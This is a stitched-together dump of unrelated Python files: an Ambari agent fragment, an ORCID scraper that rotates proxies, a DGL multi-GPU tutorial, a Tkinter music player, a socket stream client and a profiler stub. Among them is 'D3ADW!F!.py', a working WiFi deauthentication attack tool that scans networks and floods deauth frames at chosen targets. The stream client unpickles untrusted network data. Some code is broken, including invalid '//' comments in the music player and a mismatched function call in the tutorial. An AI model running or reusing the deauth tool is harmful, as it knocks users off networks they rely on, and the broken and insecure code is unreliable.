self.commandStatuses.delete_command_data(command['taskId'])
return
# final result to stdout
command_result['stdout'] += '\n\nCommand completed successfully!\n' if status == CommandStatus.completed else '\n\nCommand failed after ' + str(num_attempts) + ' tries\n'
logger.info('Command with taskId = {cid} completed successfully!'.format(cid=taskId) if status == CommandStatus.completed else 'Command with taskId = {cid} failed after {attempts} tries'.format(cid=taskId, attempts=num_attempts))
role_result = self.commandStatuses.generate_report_template(command)
role_result.update({
'stdout': command_result['stdout'],
'stderr': command_result['stderr'],
'exitCode': command_result['exitcode'],
'status': status,
})
if self.config.has_option("logging", "log_command_executes") \
and int(self.config.get("logging", "log_command_executes")) == 1 \
and log_command_output:
if role_result['stdout'] != '':
logger.info("Begin command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(role_result['stdout'], str(command['taskId']))
logger.info("End command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if role_result['stderr'] != '':
logger.info("Begin command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(role_result['stderr'], str(command['taskId']))
logger.info("End command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if role_result['stdout'] == '':
role_result['stdout'] = 'None'
if role_result['stderr'] == '':
role_result['stderr'] = 'None'
# let ambari know name of custom command
if 'commandParams' in command and command['commandParams'].has_key('custom_command'):
role_result['customCommand'] = command['commandParams']['custom_command']
if 'structuredOut' in command_result:
role_result['structuredOut'] = str(json.dumps(command_result['structuredOut']))
else:
role_result['structuredOut'] = ''
self.recovery_manager.process_execution_command_result(command, status)
self.commandStatuses.put_command_status(command, role_result)
cluster_id = str(command['clusterId'])
if cluster_id != '-1' and cluster_id != 'null':
service_name = command['serviceName']
if service_name != 'null':
component_name = command['role']
self.component_status_executor.check_component_status(cluster_id, service_name, component_name, "STATUS", report=True)
def log_command_output(self, text, taskId):
"""
Logs a message as multiple enumerated log messages every of which is not larger than MAX_SYMBOLS_PER_LOG_MESSAGE.
If logs are redirected to syslog (syslog_enabled=1), this is very useful for logging big messages.
As syslog usually truncates long messages.
"""
chunks = split_on_chunks(text, MAX_SYMBOLS_PER_LOG_MESSAGE)
if len(chunks) > 1:
for i in range(len(chunks)):
logger.info("Cmd log for taskId={0} and chunk {1}/{2} of log for command: \n".format(taskId, i+1, len(chunks)) + chunks[i])
else:
logger.info("Cmd log for taskId={0}: ".format(taskId) + text)
def get_retry_delay(self, last_delay):
"""
Returns exponentially growing delay. The idea being if number of retries is high then the reason to retry
is probably a host or environment specific issue requiring longer waits
"""
return last_delay * 2
def on_background_command_complete_callback(self, process_condensed_result, handle):
logger.debug('Start callback: %s', process_condensed_result)
logger.debug('The handle is: %s', handle)
status = CommandStatus.completed if handle.exitCode == 0 else CommandStatus.failed
aborted_postfix = self.customServiceOrchestrator.command_canceled_reason(handle.command['taskId'])
if aborted_postfix:
status = CommandStatus.failed
logger.debug('Set status to: %s , reason = %s', status, aborted_postfix)
else:
aborted_postfix = ''
role_result = self.commandStatuses.generate_report_template(handle.command)
role_result.update({
'stdout': process_condensed_result['stdout'] + aborted_postfix,
'stderr': process_condensed_result['stderr'] + aborted_postfix,
'exitCode': process_condensed_result['exitcode'],
'structuredOut': str(json.dumps(process_condensed_result['structuredOut'])) if 'structuredOut' in process_condensed_result else '',
'status': status,
})
self.commandStatuses.put_command_status(handle.command, role_result)
def reset(self):
with self.commandQueue.mutex:
self.commandQueue.queue.clear()
|
ip_proxies.py
|
# -*- coding: utf-8 -*-
"""
四进程爬虫,爬取orcid网址的信息,转存至info表
@Author: lushaoxiao
@Date: 2019/3/31
@IDE: PyCharm
"""
import requests
from bs4 import BeautifulSoup
from random import choices
import multiprocessing as mp
import re
import os
import csv
import time
import random
import json
from mysql import connector
import uuid
# 本地代理
local_proxies = {
"http": "http://127.0.0.1:1080",
"https": "http://127.0.0.1:1080",
}
# 国外代理池
proxy_url = "http://free-proxy-list.net/"
# USer-Agent
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# json获取拼接网址
person = "/person.json"
affiliationGroups = "/affiliationGroups.json"
worksPage = "/worksPage.json?offset=0&sort=date&sortAsc=false"
# 匹配出符合要求的url
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\d')
# 数据库设置
dbname = "orcid"
dbuser = "root"
dbpassword = ""
infoTableName = "info"
def get_proxies(size=1):
'''
https代理查询,需要能科学上网,且打开ss
:param size: 需要的代理数目
:return: 字典型https代理
'''
time.sleep(random.random() * 5)
flag = False
while not flag:
# 多次尝试获取代理池地址
try:
req = requests.get(proxy_url, headers=headers, proxies=local_proxies, timeout=10)
flag = True
except:
print("网络超时……")
pass
soup = BeautifulSoup(req.content, "html.parser")
all_tr = soup.find_all("tr")[1:]
proxies_list = list()
for item in all_tr:
try:
ip = item.find_all("td")[0].string
port = item.find_all("td")[1].string
https = item.find_all("td")[6].string
if https == "yes":
lt = list([ip, port])
proxies_list.append(lt)
except:
break
# 随机选择IP和端口,避免频繁使用一个代理地址
if len(proxies_list) >= size:
return dict(choices(proxies_list, k=size))
elif len(proxies_list) >= 1:
return dict(choices(proxies_list, k=len(proxies_list)))
def start_crawl(start):
'''
开始按照start开始爬取网址
:param start: 拼接网址使用,
:return: 无返回
'''
proxy = get_proxies()
for ip, port in proxy.items():
print("{}使用代理为:{}:{}".format(mp.current_process().name, ip, port))
break
i = 0
# 随即等待时间基础时间
basetime = 0.5
# 一次爬取多少行
rows = 25
# 写入数据库次数
writenum = 0
# 当前尝试次数
cnt = 0
# 获取进程名字
name = mp.current_process().name
# 已废弃,初始目的是写入csv文件,但是多进程并发不能同时写文件
# if not os.path.exists(name+".csv"):
# with open(name+".csv",'w',newline='') as csvfile:
# fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
# writer.writeheader()
# with open(name+".csv",'a+',newline='') as csvfile:
# fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
print("{}进程第{}次尝试".format(name, i+1))
url = "https://pub.sandbox.orcid.org/v2.1/search/?q=orcid&start={}&rows={}".format(start, rows)
print(url)
# 开启数据库链接
cnx = connector.connect(user=dbuser, database=dbname, password=dbpassword)
cursor = cnx.cursor()
# 定义插入数据表语句
add_info = (
"INSERT INTO " + infoTableName +
"(uuid,id,name,affiliationName,city,country,education) "
"VALUES (%s,%s,%s,%s,%s,%s,%s)"
)
try:
req = requests.Session()
try:
# 获取原始xml信息
req = requests.get(url, proxies=proxy, headers=headers, timeout=10)
except:
print("进程{}无法获取xml信息".format(name))
req.raise_for_status()
if req.status_code == 200:
req.encoding = "utf-8"
text = req.text
# 匹配所有符合要求的url
for uri in re.findall(pattern, text):
# 符合要求的url地址长度是45个字符
if len(uri) == 45:
try:
# person.json
data = requests.get(uri + person, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
persondata = json.loads(data.text)
personname = persondata['displayName']
countryname = None
if persondata['countryNames'] is not None:
country = dict(persondata['countryNames'])
for key in country:
countryname = country[key]
break
# worksPage.json?offset=0&sort=date&sortAsc=false
# work = requests.get(uri+worksPage, headers=headers, proxies=proxy, timeout=10)
# time.sleep(basetime + random.random() * 1.2)
# workdata = json.loads(work.text)
# worknum = workdata['totalGroups']
# affiliationGroups.json
education = requests.get(uri + affiliationGroups, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
edudata = json.loads(education.text)
eduname = None
affiliationName = None
city = None
try:
eduname = edudata['affiliationGroups']['EDUCATION'][0]['affiliations'][0]['affiliationName']['value']
except:
pass
try:
affiliationName = edudata['affiliationGroups']['EMPLOYMENT'][
len(edudata['affiliationGroups']['EMPLOYMENT']) - 1]['affiliations'][0][
'affiliationName']['value']
except:
pass
try:
city = edudata['affiliationGroups']['EMPLOYMENT'][
len(edudata['affiliationGroups']['EMPLOYMENT']) - 1]['affiliations'][0]['city'][
'value']
except:
# print("未找到edu信息")
pass
# print("ORCIDiD:{};name:{},country:{},education:{},works:{}".format(uri,personname,countryname,eduname,worknum))
# writer.writerow({'ORCIDiD':uri,'name':personname,'country':countryname,'education':eduname,'works':worknum})
# 主键唯一
uid = uuid.uuid4()
# 创建数据列表
add_value = [str(uid), uri, personname, affiliationName, city, countryname, eduname]
# 执行数据库写入操作
cursor.execute(add_info, add_value)
cnx.commit()
print("进程{}已成功写入{}次".format(name, writenum))
writenum += 1
except:
print("当前状态码:{}".format(data.status_code))
print("进程{}:url error {} times.".format(mp.current_process().name, cnt + 1))
cnt += 1
else:
print("网址相应错误")
except:
print("进程{}已执行{}次,中途错误,正在重新启动....".format(name, i))
i -= 1
finally:
i += 1
# 关闭数据库连接
cursor.close()
cnx.close()
print("{}进程数据库写入完成".format(name))
def delete_duplicated_id(tbname=None):
'''
后期使用,去除MySQL数据库中重复id
:param tbname: 清除的数据库表名
:return:
'''
if tbname is None:
raise RuntimeError("清除id错误,您未指定数据库名")
cnx = connector.connect(user=dbuser, database=dbname, password=dbpassword)
query = "SELECT id FROM " + tbname + " GROUP BY id HAVING COUNT(*) > 1"
cursor = cnx.cursor()
cursor.execute(query)
records = cursor.fetchall()
cnt = 1
for item in records:
id = item[0]
sql = "SELECT uuid FROM " + tbname + " WHERE id = \"{}\"".format(id)
cursor.execute(sql)
data = cursor.fetchall()
uid = data[0][0]
delete_sql = "DELETE FROM " + tbname + " WHERE id = \"{}\" AND uuid != \"{}\"".format(id, uid)
cursor.execute(delete_sql)
print("已执行{}次".format(cnt))
cnt += 1
cnx.commit()
cursor.close()
cnx.close()
if __name__ == '__main__':
size = mp.cpu_count()
start = [x for x in range(0, 10)]
# 执行一次完整任务计数
cnt = 0
for ind in start:
# 四进程并发执行
p1 = mp.Process(target=start_crawl, args=(ind * 100,), name="p1")
p2 = mp.Process(target=start_crawl, args=(ind * 100 + 25,), name="p2")
p3 = mp.Process(target=start_crawl, args=(ind * 100 + 50,), name="p3")
p4 = mp.Process(target=start_crawl, args=(ind * 100 + 75,), name="p4")
p1.start()
p2.start()
p3.start()
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
p1.terminate()
p2.terminate()
p3.terminate()
p4.terminate()
|
1_graph_classification.py
|
"""
Single Machine Multi-GPU Minibatch Graph Classification
=======================================================
In this tutorial, you will learn how to use multiple GPUs in training a
graph neural network (GNN) for graph classification. This tutorial assumes
knowledge in GNNs for graph classification and we recommend you to check
:doc:`Training a GNN for Graph Classification <../blitz/5_graph_classification>` otherwise.
(Time estimate: 8 minutes)
To use a single GPU in training a GNN, we need to put the model, graph(s), and other
tensors (e.g. labels) on the same GPU:
"""
"""
import torch
# Use the first GPU
device = torch.device("cuda:0")
model = model.to(device)
graph = graph.to(device)
labels = labels.to(device)
"""
###############################################################################
# The node and edge features in the graphs, if any, will also be on the GPU.
# After that, the forward computation, backward computation and parameter
# update will take place on the GPU. For graph classification, this repeats
# for each minibatch gradient descent.
#
# Using multiple GPUs allows performing more computation per unit of time. It
# is like having a team work together, where each GPU is a team member. We need
# to distribute the computation workload across GPUs and let them synchronize
# the efforts regularly. PyTorch provides convenient APIs for this task with
# multiple processes, one per GPU, and we can use them in conjunction with DGL.
#
# Intuitively, we can distribute the workload along the dimension of data. This
# allows multiple GPUs to perform the forward and backward computation of
# multiple gradient descents in parallel. To distribute a dataset across
# multiple GPUs, we need to partition it into multiple mutually exclusive
# subsets of a similar size, one per GPU. We need to repeat the random
# partition every epoch to guarantee randomness. We can use
# :func:`~dgl.dataloading.pytorch.GraphDataLoader`, which wraps some PyTorch
# APIs and does the job for graph classification in data loading.
#
# Once all GPUs have finished the backward computation for its minibatch,
# we need to synchronize the model parameter update across them. Specifically,
# this involves collecting gradients from all GPUs, averaging them and updating
# the model parameters on each GPU. We can wrap a PyTorch model with
# :func:`~torch.nn.parallel.DistributedDataParallel` so that the model
# parameter update will invoke gradient synchronization first under the hood.
#
# .. image:: https://data.dgl.ai/tutorial/mgpu_gc.png
# :width: 450px
# :align: center
#
# That’s the core behind this tutorial. We will explore it more in detail with
# a complete example below.
#
# Distributed Process Group Initialization
# ----------------------------------------
#
# For communication between multiple processes in multi-gpu training, we need
# to start the distributed backend at the beginning of each process. We use
# `world_size` to refer to the number of processes and `rank` to refer to the
# process ID, which should be an integer from `0` to `world_size - 1`.
#
import torch.distributed as dist
def init_process_group(world_size, rank):
dist.init_process_group(
backend='nccl',
init_method='tcp://127.0.0.1:12345',
world_size=world_size,
rank=rank)
###############################################################################
# Data Loader Preparation
# -----------------------
#
# We split the dataset into training, validation and test subsets. In dataset
# splitting, we need to use a same random seed across processes to ensure a
# same split. We follow the common practice to train with multiple GPUs and
# evaluate with a single GPU, thus only set `use_ddp` to True in the
# :func:`~dgl.dataloading.pytorch.GraphDataLoader` for the training set, where
# `ddp` stands for :func:`~torch.nn.parallel.DistributedDataParallel`.
#
from dgl.data import split_dataset
from dgl.dataloading import GraphDataLoader
def get_dataloaders(dataset, seed, batch_size=32):
# Use a 80:10:10 train-val-test split
train_set, val_set, test_set = split_dataset(dataset,
frac_list=[0.8, 0.1, 0.1],
shuffle=True,
random_state=seed)
train_loader = GraphDataLoader(train_set, use_ddp=True, batch_size=batch_size, shuffle=True)
val_loader = GraphDataLoader(val_set, batch_size=batch_size)
test_loader = GraphDataLoader(test_set, batch_size=batch_size)
return train_loader, val_loader, test_loader
###############################################################################
# Model Initialization
# --------------------
#
# For this tutorial, we use a simplified Graph Isomorphism Network (GIN).
#
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn.pytorch import GINConv, SumPooling
class GIN(nn.Module):
def __init__(self, input_size=1, num_classes=2):
super(GIN, self).__init__()
self.conv1 = GINConv(nn.Linear(input_size, num_classes), aggregator_type='sum')
self.conv2 = GINConv(nn.Linear(num_classes, num_classes), aggregator_type='sum')
self.pool = SumPooling()
def forward(self, g, feats):
feats = self.conv1(g, feats)
feats = F.relu(feats)
feats = self.conv2(g, feats)
return self.pool(g, feats)
###############################################################################
# To ensure same initial model parameters across processes, we need to set the
# same random seed before model initialization. Once we construct a model
# instance, we wrap it with :func:`~torch.nn.parallel.DistributedDataParallel`.
#
import torch
from torch.nn.parallel import DistributedDataParallel
def init_model(seed, device):
torch.manual_seed(seed)
model = GIN().to(device)
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
return model
###############################################################################
# Main Function for Each Process
# -----------------------------
#
# Define the model evaluation function as in the single-GPU setting.
#
def evaluate(model, dataloader, device):
model.eval()
total = 0
total_correct = 0
for bg, labels in dataloader:
bg = bg.to(device)
labels = labels.to(device)
# Get input node features
feats = bg.ndata.pop('attr')
with torch.no_grad():
pred = model(bg, feats)
_, pred = torch.max(pred, 1)
total += len(labels)
total_correct += (pred == labels).sum().cpu().item()
return 1.0 * total_correct / total
###############################################################################
# Define the main function for each process.
#
from torch.optim import Adam
def main(rank, world_size, dataset, seed=0):
init_process_group(world_size, rank)
# Assume the GPU ID to be the same as the process ID
device = torch.device('cuda:{:d}'.format(rank))
torch.cuda.set_device(device)
model = init_model(seed, device)
criterion = nn.CrossEntropyLoss()
optimizer = Adam(model.parameters(), lr=0.01)
train_loader, val_loader, test_loader = get_dataloaders(dataset,
seed,
world_size,
rank)
for epoch in range(5):
model.train()
# The line below ensures all processes use a different
# random ordering in data loading for each epoch.
train_loader.set_epoch(epoch)
total_loss = 0
for bg, labels in train_loader:
bg = bg.to(device)
labels = labels.to(device)
feats = bg.ndata.pop('attr')
pred = model(bg, feats)
loss = criterion(pred, labels)
total_loss += loss.cpu().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = total_loss
print('Loss: {:.4f}'.format(loss))
val_acc = evaluate(model, val_loader, device)
print('Val acc: {:.4f}'.format(val_acc))
test_acc = evaluate(model, test_loader, device)
print('Test acc: {:.4f}'.format(test_acc))
dist.destroy_process_group()
###############################################################################
# Finally we load the dataset and launch the processes.
#
if __name__ == '__main__':
import torch.multiprocessing as mp
from dgl.data import GINDataset
num_gpus = 4
procs = []
dataset = GINDataset(name='IMDBBINARY', self_loop=False)
for rank in range(num_gpus):
p = mp.Process(target=main, args=(rank, num_gpus, dataset))
p.start()
procs.append(p)
for p in procs:
p.join()
|
GUI MUSIC PLAYER.py
|
""" Music Player
----------------------------------------
"""
import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
root.get_themes() // Returns a list of all themes that can be set
root.set_theme("radiance") // Sets an available theme
// Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
// MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
//
// Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)
// Create the menubar
menubar = Menu(root)
root.config(menu=menubar)
// Create the submenu
subMenu = Menu(menubar, tearoff=0)
playlist = []
// playlist - contains the full path + filename
// playlistbox - contains just the filename
// Fullpath + filename is required to play the music inside play_music load function
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
mixer.music.queue(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Melody', 'This is a music player build using Python Tkinter by @attreyabhatt')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)
mixer.init() // initializing the mixer
root.title("Melody")
root.iconbitmap(r'images/melody.ico')
// Root Window - StatusBar, LeftFrame, RightFrame
// LeftFrame - The listbox (playlist)
// RightFrame - TopFrame,MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
// div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
// mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
// Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
// set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
muted = FALSE
def mute_music():
global muted
if muted: // Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: // mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)
// Bottom Frame for volume, rewind, mute etc.
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
live_stream_client.py
|
import pickle
import socket
import struct
from threading import Thread
class LiveStreamClient:
def __init__(self):
self.client_socket = None
self.receive_thread = None
self.image_callbacks = []
def connect(self, ip_address: str, port: int):
self.receive_thread = Thread(target=self._receive, args=(ip_address, port))
self.receive_thread.start()
def stop(self):
self.receive_thread.stop()
def _receive(self, ip_address: str, port: int):
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((ip_address, port))
data = b''
payload_size = struct.calcsize("L")
while True:
while len(data) < payload_size:
data += self.client_socket.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += self.client_socket.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
self._send_frame_callback(frame)
def _send_frame_callback(self, frame):
for callback in self.image_callbacks:
callback(frame)
def register_image_callback(self, callback):
self.image_callbacks.append(callback)
|
D3ADW!F!.py
|
#!/usr/bin/python3
import signal
from time import sleep as timeout
from scapy.all import *
from pyfiglet import figlet_format
from scapy.layers.dot11 import Dot11Beacon, Dot11ProbeResp, Dot11, Dot11Deauth, Dot11Elt, Dot11AssoReq, Dot11Auth
from termcolor import colored
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import platform
import os
from tqdm import tqdm
from colors import red, green, blue
from time import sleep
def restart_program() :
python = sys.executable
os.execl(python, python, *sys.argv)
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("D3AD WiFi"), color="cyan"))
print('=' * 60)
print("\t\tDeveloped By •ArunAppoos (©) 2020")
print('=' * 60)
print(red("NOTE: Before using this tool, you must enable monitor mode on your wifi adapter."))
option = input("Choose which tool you want to use! \n \t[1] WiFi Deauth Tool \n \t[2] WiFi Deauth Detection Tool \n"
"\nEnter your choice: ")
if option == "1" :
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("W!F! Deauth"), color="blue"))
def add_network(pckt, known_networks) :
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[
Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
channel = int(ord(pckt[Dot11Elt :3].info))
if bssid not in known_networks :
known_networks[bssid] = (essid, channel)
print("{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid))
def channel_scan() :
while True :
try :
channel = random.randrange(1, 13)
os.system("iwconfig %s channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt :
break
def stop_channel_scan() :
global stop_sniff
stop_sniff = True
channel_scan.terminate()
channel_scan.join()
def keep_sniffing() :
return stop_sniff
def perform_deauth(bssid, client, count) :
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' :
cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print('Sending Deauth to ' + client + ' from ' + bssid)
if not count : print('Press CTRL+C to quit')
while count != 0 :
try :
for i in range(64) :
send(pckt)
if client != 'FF:FF:FF:FF:FF:FF' : send(cli_to_ap_pckt)
count = -1
except KeyboardInterrupt :
break
if __name__ == "__main__" :
interface: str = input("Select the wifi interface(ex.mon0) : ")
conf.iface = interface
networks = {}
stop_sniff = False
print('>>Press Ctrl+c to stop sniffing!<<')
bla = blue("Scanning wifi networks")
for i in tqdm(range(100), desc=bla) :
sleep(0.1)
print('=' * 60 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel', 'ESSID', 'BSSID') + '=' * 60)
channel_scan = Process(target=channel_scan(), args=(interface,))
channel_scan.start()
signal.signal(signal.SIGINT, stop_channel_scan())
sniff(lfilter=lambda x : (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=keep_sniffing,
prn=lambda x : add_network(x, networks))
signal.signal(signal.SIGINT, signal.SIG_DFL)
print('=' * 60)
target_bssid = input('Enter a BSSID to perform deauth attack (q to quit): ')
while target_bssid not in networks :
if target_bssid == 'q' : sys.exit(0)
input('BSSID not found... Please enter a valid BSSID (q to quit): ')
print('Changing ' + interface + ' to channel ' + str(networks[target_bssid][1]))
os.system("iwconfig %s channel %d" % (interface, networks[target_bssid][1]))
target_client = input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client :
target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = input('Number of deauth packets (Default: -1 [constant]): ')
if not deauth_pckt_count :
deauth_pckt_count = -1
perform_deauth(target_bssid, target_client, deauth_pckt_count)
if option == "2" :
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("Deauth Detector"), color="blue"))
interface = input("Select the wifi interface(ex.mon0) : ")
def sniffReq(p) :
if p.haslayer(Dot11Deauth) :
print(
p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]"))
if p.haslayer(Dot11AssoReq) :
print(
p.sprintf(
"Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]"))
if p.haslayer(Dot11Auth) :
print(
p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]"))
print(
p.sprintf(
"------------------------------------------------------------------------------------------"))
sniff(iface=interface, prn=sniffReq)
elif option >= '3' :
print("Error! Enter a valid option.")
restart_program()
elif option == '0' :
print("Error! Enter a valid option.")
restart_program()
else :
timeout(3)
restart_program()
|
iprof_app.py
|
# This is a modified version of:
# http://sourceforge.net/p/imvu/code/HEAD/tree/imvu_open_source/tools/pstats_viewer.py
import os
import pstats
import sys
import traceback
import time
import webbrowser
import fnmatch
import threading
from six import StringIO
import tornado.ioloop
import tornado.web
def launch_browser(port):
time.sleep(1)
webbrowser.get().open('http://localhost:%s' % port)
def startThread(fn):
thread = threading.Thread(target=fn)
thread.setDaemon(True)
thread.start()
return thread
def htmlquote(fn):
return fn.replace('&', '&').replace('<', '<').replace('>', '>')
def shrink(s):
if len(s) < 40:
return s
return s[:20] + '...' + s[-20:]
def formatfunc(func):
file, line, func_name = func
return '%s:%s:%s' % (os.path.basename(file), line, htmlquote(shrink(func_name)))
def formatTime(dt):
return '%.2fs' % dt
def formatTimeAndPercent(dt, total):
percent = "(%.1f%%)" % (100.0 * dt / total)
if percent == '(0.0%)':
percent = ''
return '%s <font color=#808080>%s</a>' % (formatTime(dt), percent)
def wrapTag(tag, body, klass=''):
if klass:
klass = 'class=%s' % klass
return '<%s %s>%s</%s>' % (tag, klass, body, tag)
class Application(tornado.web.Application):
def __init__(self, stats, selector):
self.stats = stats
self.stats.stream = StringIO()
self.stats.calc_callees()
self.total_time = self.stats.total_tt
self.filename = self.stats.files[0]
width, self._full_print_list = self.stats.get_print_list(())
if selector is None:
